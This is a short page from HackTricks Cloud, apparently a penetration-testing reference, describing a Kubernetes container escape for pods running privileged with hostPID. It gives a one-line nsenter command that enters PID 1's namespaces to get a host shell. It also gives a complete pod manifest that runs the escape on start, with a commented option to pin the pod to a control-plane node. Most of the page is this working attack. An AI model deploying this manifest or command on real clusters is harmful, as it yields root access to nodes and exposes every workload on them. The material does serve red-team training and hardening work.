HackTricks Cloud
HackTricks Training Twitter Linkedin Sponsor

Pod Escape Privileges

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Privileged and hostPID

With these privileges you will have access to the hosts processes and enough privileges to enter inside the namespace of one of the host processes. Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp).

Just executing something like the following will allow you to escape from the pod:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Configuration example:

apiVersion: v1
kind: Pod
metadata:
  name: priv-and-hostpid-exec-pod
  labels:
    app: pentest
spec:
  hostPID: true
  containers:
  - name: priv-and-hostpid-pod
    image: ubuntu
    tty: true
    securityContext:
      privileged: true
    command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
  #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

PreviousAbusing Roles/ClusterRoles in KubernetesNextKubernetes Roles Abuse Lab

Last updated